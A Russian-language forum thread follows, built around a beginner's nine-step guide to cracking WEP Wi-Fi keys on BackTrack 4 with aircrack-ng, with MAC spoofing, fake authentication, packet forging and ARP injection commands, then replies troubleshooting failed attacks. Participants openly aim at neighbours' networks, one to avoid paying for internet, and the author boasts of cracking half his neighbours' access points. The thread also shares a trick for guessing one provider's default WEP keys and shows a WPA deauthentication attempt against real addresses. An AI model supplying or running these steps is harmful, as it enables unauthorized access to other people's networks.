9 шагов или БТ4 взлом wep для начинающих!
 

Статейку накатал с опыта много чего не указал примеров нету и не нада - выложу видео ето будет проще
используем БТ4 , статья для тех кто не знает что такое линукс и ниразу с ним не работал не бойтесь
пытаться юзать линукс все очень просто я уверен что у вас получиться , все остальные вопросы можна найти на форуме
я уверен что там есть ответы.

1) airmon-ng start wifi0 Запускаем карту ( wlan0 -ето интерфейс он у каждого компа разный в даном случае wlan0)
еще бывают ath0 mon0 итп.
2) airodump-ng wlan0 Запускаем мониторинг список сетей, выбираем мак сети и канал который будем ломать
определиться с выбором можна просто смотрим какой сигнал сильнее логично , ето дело можна записывать но я
просто командой выдиляем ето окно и жмем Ctrl+c - останавливает процес мониторинга , после выбора канала
останавливаем все окна командой Ctrl+c и делаем такое
airmon-ng stop mon0
airmon-ng stop wlan0 (внимание ето мой интерфейс у вас он может быть другим я выше писал)
airmon-ng start wlan0 и канал сети которую будем ломать выглядит ето так
airmon-ng start wlan0 9 - пример.


3) macchanger wlan0 смотрим свой мак адрес, визде по разному работает если у вас их 2 то первый ваш.
В линуксе есть по стандарту 2 десктопа первые три выше указаных команды проделываем в одном десктопе
а все остальное открываем 2 десктоп и проделываем все остальное ниже указаное ето для вашего удобства.

4) airodump-ng -c канал сети --bssid мак сети которую ломаем -w capture wlan0 запускаем монитор сети
в етом окне будет мак ломаемой сети. И будут собираться пакеты.

Пятая команда выполняеться в одном окне если все прошло нормально после пыполнения команд вы увидите
англ текст и вот такое вот :-)
5) 1. aireplay-ng -1 0 -e (название сети которую ломаем) -a (мак сети которую ломаем) -h (ваш мак) wlan0
2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) wlan0

6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y
7) aireplay-ng -4 -h (ваш мак) -b (мак который ломаем) wlan0 атака отдельное окно будет задавать вопрос
жмем y


Если атака удалась то вы увидите файл .xor - его нада прописать ниже в первой команде
8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2.
2. aireplay-ng -2 -r arp-request wlan0
Команда 8 набираем в одном окне
Ну вот и конец всему при наборе етой команды програма начнет переберать собраные пакеты их нада от 20 000
до 2000000 восновном весь процес в среднем занимает 15- 60 минут ,
если у вас не удалось запустить -4 -5 и -1 не растраивайтесь продолжайте собирать пакеты они форматом .cap
сохраняються на ваш рабочий стол..
9) aircrack-ng -b ломаемый мак capture*.cap

Если пишет что KEY FOUND! - вы нашли пароль ... если в пароле будут все нули ето не верный пароль, продолжайте
собирать пакеты до тех пор пока не найдете пароль ... взлом только шифрование wep

Я думаю у вас получиться 8-)...
БТ4 качаем с оф сайта большая скорость пол часа и скачали бесплатно.
Более конкретно обсосать aircrack и airdump можна у Elvis000 на ветке
.................................................. ...................................
Что б не флудить решил сюда добавить по теме у кого провайдер PTv недавно просек тему у них у всех стоит wep 64 битный , пароль можна узнать очень просто 1. вариант admin логин и пароль 2. вариант МАК адрес ето и есть пароль только пропустите первые две цыфры а все остальное ето пароль , 5 точек проверил все работает ! :-) ...

Отлично, жду видио.

bt4 предфинальная версия:

Шаг 1 останавливаем wi-fi карту: ifconfig wlan0 down
шаг 2 меняем мак: macchanger --mac 00:11:11:11:11:11 wlan0
шаг 3 подымаем wi-fi карту: ifconfig wlan0 up
шаг 3 включаем wi-fi карту в режим мониторинга: airmon-ng start wlan0 "получаем виртуальный интерфейс mon0"
шаг 4 запускаем программу сканирования wi-fi сетей: airodump-ng mon0
шаг 5;6:7 и тд. читаем тему от Elvis000 "Документация по airodump-ng, aircrack-ng." там всё популярно написано.

фак писал что б пасажири которые не умеют летать на линукс не писали в пм а сразу ломали сеть . зачем флудить в теме ?

Я тебя засужу за обман.. на моем Зюкселе 56К не скачалось за пол часа ;) (стеб)

этой статьей ты только сильнее превлек внимание к своему ПМ, да и те кто "не умеют летать на линукс" даже с этой статейкой не полетят.

Это не флуд а открытое мнение о том что ты, как таковое выложил перевод офф. доков (просто сжато и на родимом, могучем. за что и маленький респектик тебе).

извини конечно но твоя статья никак не может быть руководством для начинающих пользоваться ОС Linux и д.р. Unix подобных.

Спасибо за внимание, оформление статьи не сахар =(

POS_troi


я видио выложу тады в ПМ писать не будут 8-)

На пятом пункте постоянно:

Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.

------------
все сломать эту точку уже не удастся, верно?

LuCiFeR если это wep то получить пороль можно.
У вас может не хватает мощности вашей wi-fi карты или на AP стоит фильтрация по MAC, ещё попробуйте пройти Authentication когда на AP появится клиент.

LuCiFeR у тя чипсет не centrino случайно ? если да то просто собирай пакеты , на 25000 можешь пробовать крякать если мало собирай до тех пор пока не напишет что пароль найден

У меня Асус М50Vc. я склоняюсь к тому варианту что сигнал слабоват.
Вообще я занимаюсь этим впервые, до этого никсы вообще не трогал. Но обстоятельства сложились так, что в этом месяце я не могу заплатить за свой инет, по этому ищу альтернативу в соседском вай фае)))

http://img62.imageshack.us/img62/3482/snapshot1hm.png

Кто нить тут видит приличную точку? )))

LuCiFeR

самая первая самая нижняя и кствати одна открытая )

Ищи где шифрования WEP, и снифай ломай))
а WPA брутить надо=)

я то полетел -)....

6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y

вот так правильней по моему ><


-----------

не понимаю я, пробовал уже 4 wep защищенных точки, ни разу не удалось... хотя сигнал больше половины... может у меня карточка не подходящая?

ага .. очепятка . исправил!
если карта не подходит то просто собирай пакеты , да оно б писало что вас чипсет не подходит на англ... у тя не сентрино чипсет случйно если нет то не беспокойся )

atheros

Застрял на третем пункте
ввожу sudo macchanger wlan0
Current MAC: 00:11:11:11:11:11 (Intel Corporation)
ERROR: Can't change MAC: interface up or not permission: Device or resource busy

с чем это связано?

Robert007, ifconfig wlan0 down
Читай код ошибки, устройство занято, следовательно его нужны остановить...

Вопрос к затокам, я пробовал 10 разновидностей атак, при сигнале 100% на 10 разных точках, ни разу не смог добится хотяб какого нить результата... У меня убунту 9.10 с пакетом аиркрака... быть может у меня драйвер не подходит? Чипсес atheros, дрова стандартные с пакета убунту. Подскажите что делать. Модель ноутбука Asus M50Vc

Всё чделал как написано
Пункт 4,6,7 без проблем
Идёт мониторинг и два окна читают пакеты (вроде всё нормально 9000 и 7000 пакетов)

оно само законить читать или нужно выключить в ручную?
на рабочем столе никаких файлов не появилось,они появяться потом?
в мониторинге в #Data стоит значение 6 и не поднимаеться,это нормально?

ни с чем просто мак адрес копируй и делай все дальше .... -)

дата ето вектора ивы пакеты которые ломаються их нада собирать если молчит то нада ждать пока подымиться хотя б до 25 000

должно работать. оно если атака не удаеться выкидывает ерор там написано что не конает

Скажи пожалуйста а для чего тогда пункт 6,7?read packets когда нибудь закончиться?

что делать когда наберёться 25000?где искать файл?

извини за нубство,просто я сегодня первый раз увидел убунту и всё это для меня новое

Во я дебил!

теща, постоянно одинаковые ошибки... о том что либо фильтрация по мак адрессу, либо сигнал слабый... при любом виде атаки на любое шифрование...
+ ко всему wifizoo ни ловит ни одного пакета с открытых точек..

Я думаю что всё таки проблема в стандартном драйвере ath9k - [phy0], как его заменить пока понять не могу... скачал в менеджере приложений madwifi-drivers и madwifi-tools, но драйвер все равно не сменился, а тулзу запустить не могу...
Не подскажите как в ручную сменить драйвер?

Или запустить под root'ом, либо в начале каждой команды пиши sudo
Например sudo airmon-ng start wlan0

ты бт4 скачай , ато я на нем все делл прошло вс ништяк половина соседей поломаных , обещал зделать видео при перво же возможности повешаю сюда времени ноль ( ...
если мониторинг был уже ништяк ! мак карты тоже определло не должно быть никаких проблем! ты внимательно пишеш 1 ошибка и команда не конает ..я долго игрался )

Пишу все правильно... и дело не в сборке, один фиг убунта)) Так что нету инфы как дрова поставить? )

в раздел линукс подождешь пару дней можт кто ответит :-) ... там трудный вариант чет добиться ) . а еще лучше по гуглить ... я не думаю что ето дрова чет другое .. посстараюсь к вечеру видео зделать

не забывайте что точки могут фильтровать по списку разрешенных MAC

ага я тож так поставил ибо впа ткип и мой 18 символьный пароль на долго не хватает :-) ...

да я это понимаю, но дело в том что я свою точку настроил на стандартный wep, сам его сломать не смог ;D
тоже самое с wpa и wpa2

а так-же сделал её открытой, и пытался по снифить через wifizoo, результат нулевой.

Все мои мысли сводятся к драйверу ath9k - [phy0], который работает не правильно, хотя в монитор режим переводит без проблем..

POS_troi, а ты случаем не знаешь как мне его заменить на madwifi? ;)

тут почитай

http://sudouser.com/ustanovka-drajvera-madwifi-dlya-setevogo-adaptera-atheros-5xxx.html

Решил проблему с Wifizoo, удалил убунту 9.10, поставил БТ4))))))))
Ща буду пробовать вепы ломать))

давно пора ! удалять не нада было просто грузился б с диска как и все остальные :-)

Чет пока глухо все попытки поломать WPA кончаются этим:

root@LuCiFeR:~# aireplay-ng -0 1 -a 00:14:6C:94:A8:06 -c 00:17:31:AF:4B:90 wlan0
03:06:21 Waiting for beacon frame (BSSID: 00:14:6C:94:A8:06) on channel 11
03:06:21 Sending 64 directed DeAuth. STMAC: [00:17:31:AF:4B:90] [ 0| 0 ACKs]
root@LuCiFeR:~#

жесть.. ;(

Пысы: Кто нить подскажет как раскладку клавиатуры настроить? Стандартно не переключается, на русский могу перейти только через ctrl+alt+k ;(

теща, а правильно что я 5 - 6 - 7 пункты выполняю одновременно в разных окнах? )

Вот такая штуковина

Failure: the access point does not properly discard frames with an
invalid ICV - try running aireplay-ng in non-authenticated mode instead.

Больше 1200 data собрать не удалось (((

да 6 7 две разных атаки -4 срабатывает чаще чем -5

ты ж ведь када начинаешь ломать сеть останавливаешь все мониторы равда ? командой контл С ... потом када начинаешь в самом первом окне ты давал команду к примеру
airmon-ng start wlan0 11 где 11 - ломаемый канал
если меняешь сеть визде все остановить и перепрописать или проще для тебя начать заново но мониторы следует останавливать командой стоп перед тем как начинать сканировать другую сеть..

Когда я начинаю аероплей у меня картачка в монитор моде, следит за аеродампом по каналу определенному. больше ни чего вроде не запущено